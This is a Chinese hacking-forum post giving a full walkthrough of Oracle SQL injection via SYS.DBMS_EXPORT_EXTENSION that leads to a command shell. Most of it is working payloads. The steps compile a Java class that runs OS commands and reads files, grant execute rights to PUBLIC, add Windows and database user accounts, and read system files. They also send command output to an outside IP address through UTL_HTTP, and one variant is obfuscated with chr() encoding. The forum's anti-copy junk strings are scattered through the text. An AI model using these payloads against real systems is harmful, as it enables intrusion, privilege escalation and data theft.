找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
返回列表 发新帖
查看: 2591|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
4 t7 J4 ^  \* k) G! B  \
" _' \' @* Z8 X& ?* a  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
% f- D* G  U( v# D- q7 u( |4 O的形式即可。(用" 'a'|| "是为了让语句返回true值)
( g, d% S$ E: [5 ^# B1 z语句有点长,可能要用post提交。
# n- j$ f1 ^: S# j! h3 Q  b以下是各个步骤:
) G9 F( s) Y$ e6 g3 b1 s1.创建包
) {& q# m3 `4 J5 z4 `- j3 e通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:5 Y) C* d6 j6 F2 ]) h
/xxx.jsp?id=1 and '1'<>'a'||( 9 j* L) h5 e- Z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 f. B* D$ S+ c: P" \* z7 T; Ccreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(( q$ y, c6 ?' a
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}/ @- R9 L- k( S) k4 B) p2 D! m& B
}'''';END;'';END;--','SYS',0,'1',0) from dual
& P* s% n5 M3 w, S$ B4 F5 M)
3 j  g; ~; C& l: h  Q------------------------
1 a$ h4 s$ o. t, e6 `如果url有长度限制,可以把readFile()函数块去掉,即:
% O2 `* Y" T; ^2 P5 m$ \; O3 l/xxx.jsp?id=1 and '1'<>'a'||(
7 B) A1 D. |3 |0 k1 xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 ]% I! f/ p% G6 Y4 @) E0 xcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(: W4 A; g/ v: O+ w
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
  D" X  E5 ^5 M8 @4 J}'''';END;'';END;--','SYS',0,'1',0) from dual + ]* W& l! w2 f5 h: t: e
)
- J5 I6 X/ x& b) {1 L6 w同时把后面步骤 提到的 对readFile()的处理语句去掉。
* f2 B# y- R0 y: R------------------------------ / Y5 r% q4 \  M2 J
2.赋Java权限
+ x7 G6 D& d5 L2 l  y  Hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual5 n0 z- T( O2 V5 F5 d. G& d
3.创建函数 3 a$ ]' a& H9 q2 {! v* n
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 ~$ W/ H+ k3 p; L
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
) ~: C6 T$ |5 d; J/ c1 X6 W$ s9 |select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) O  N3 a4 Z; K& V7 r5 I6 b8 X7 Zcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
& o0 I) N8 w7 M7 ]4.赋public执行函数的权限 5 h2 X  H  @% T8 |2 M
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual. T, [% g/ H( w! Y% X! Q
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual8 q" |/ W* Y1 F  C
5.测试上面的几步是否成功 ! }5 m0 m( i2 h. |8 F0 h! y% R+ R
and '1'<>'11'||( 2 L6 P4 U% S" ]3 ?. D
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
# j! Q: Z/ z2 I  \: ?" b' M)
0 S4 q- u3 T! i" f0 A5 e0 Pand '1'<>(
: f; J1 o8 j* V1 {. Gselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
+ r. V; ~, U$ _8 a5 [' l8 t)
% t/ M& f( N2 x& s9 ]6.执行命令:
: h$ k0 W) {8 y9 |/xxx.jsp?id=1 and '1'<>(
% V' v8 Q% e5 h$ a, Z! kselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual 5 H0 u5 B6 i- K$ r9 F; i% ]
2 o/ o2 Z2 q2 ?' u
)
# ~6 ^+ f: _2 J- X# V  @/xxx.jsp?id=1 and '1'<>(
' }& Q6 r5 B0 n0 N- p- J2 Jselect  sys.LinxReadFile('c:/boot.ini') from dual
% ?2 z. ^7 R; |8 G( B+ C1 r" R7 j/ a4 v
)+ A; }/ ?0 `( b
  
' c) G& o+ l7 ]0 T0 s: n) A# S5 h6 B$ j注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 " b/ m1 f6 [* ]! B( u
如果要查看运行结果可以用 union : ) D, o* D% f: ]- u! M
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
$ y4 c8 G) @; c% M- d% _# f或者UTL_HTTP.request(: + A' X" B; l( ~! ]! l$ C! H/ M
/xxx.jsp?id=1 and '1'<>(
$ _& w  g( d+ k( {SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual$ Z$ Y  b6 \( @  g  }! r7 m
)
7 q% [0 S& s( o. {2 a/xxx.jsp?id=1 and '1'<>(
- k# X8 L2 W# X9 D4 k% z6 tSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
" m' c; S) W: }  X/ H% {)
/ [) ]" s% p) E; W% l6 {注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。3 M7 w; A" z9 t0 v3 J( Y
-------------------- ; {5 I: {% |% ]4 P( Y4 i+ r( u
6.内部变化
0 F3 h& I1 @1 D8 R$ Y8 o$ n* @9 c通过以下命令可以查看all_objects表达改变: , j4 W0 ?- A2 [) x5 [4 C/ W
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'3 D! z! `: |. s
7.删除我们创建的函数 5 [2 ?+ z4 ?- [) V, X" H
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. ^' \; ^4 }1 Q% x: v5 wdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
/ u* J. \" I/ q$ u! h2 R/ M9 g8 u====================================================
# n$ J" i6 _6 R全文结束。谨以此文赠与我的朋友。 : {* S/ |/ k6 [. D+ C) m6 F
linx
4 U7 x/ r% ]+ M; |124829445 & l5 s7 \# E, T4 c0 C& U3 f$ o
2008.1.12 $ u" ?( w. j# u1 S8 B0 P8 x
linyujian@bjfu.edu.cn , U" n0 z- C  h) k1 C+ ]3 C
====================================================================== & M  O4 m! A' w# L7 I
测试漏洞的另一方法: ' F5 C. ~9 L1 k
创建oracle帐号: - z$ [9 \3 z$ t( \9 w7 \& m7 B  f9 K" g
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# C, T  x$ `% w; ?
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
- l% d, `2 B! t. @- k( Q即: - Q0 L3 D0 e( r6 s1 O
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),* J0 Q* _* |& ?. A; o1 y" F
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 2 k+ S1 t+ I9 \# O" F
确定漏洞存在:
/ H7 c3 Y1 i8 f, D1<>(
9 N6 u/ E8 H5 p! C1 g: ]select user_id from all_users where username='LINXSQL'
6 m( r; E8 N1 z. a; ^) 3 X8 P  P: D) K; V
给linxsql连接权限: ! R1 d& A9 n1 ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. d3 w" T/ g4 M4 \' q9 e/ cGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
6 s+ a1 a9 X* \+ }: n2 b- V4 ?删除帐号:
' Y& M, E6 F; u: B$ z! }6 ^9 e8 d$ [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* z! B* K* f8 v2 d& @, sdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 7 ^& q4 U' n: B
======================
: K0 {5 S& d& h以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:+ @3 X7 U+ ^- [8 C) e+ \# N- [
1.jsp?id=1 and '1'<>( ' Y( I* P  z( [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 a2 [. C$ v' D' r0 G3 _# G& l$ Ucreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual6 s3 Y4 |- H* m3 E+ A
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
; x3 }# @+ w) y& H2 S1 G )" j2 C: k5 s! d. N" Q* i

0 D$ W+ ?* s; Z+ B' D
/ @2 y4 i: z6 N( {+ m& e1 @0 R' o# |0 c8 w6 n4 N% b4 _
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表